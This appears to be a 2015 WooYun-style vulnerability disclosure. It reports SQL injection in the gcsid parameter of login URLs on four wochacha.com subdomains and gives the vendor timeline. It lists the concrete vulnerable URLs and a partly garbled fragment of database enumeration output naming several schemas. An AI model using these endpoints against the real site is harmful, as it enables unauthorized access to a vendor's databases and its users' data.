2015-08-07: Details reported to the vendor; awaiting vendor response
2015-08-12: The vendor chose to ignore the vulnerability; details disclosed to the public
http://wap.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
http://wphone.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
http://symbian.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
http://android.wochacha.com/index/login?gcsid=3266eb92c42c61e960796c0372e1bd60
Across these different sites, the gcsid parameter is vulnerable to injection.
available databases [8]:[*] `\t`[*] `\x02`[*] `\x02A``*] `gcore[*] gcoreinc[*] information_schema[*] mysql[*] securi
Severity: No impact (ignored by vendor)
Ignored at: 2015-08-12 16:48
Vulnerability Rank: 15 (WooYun rating)
None yet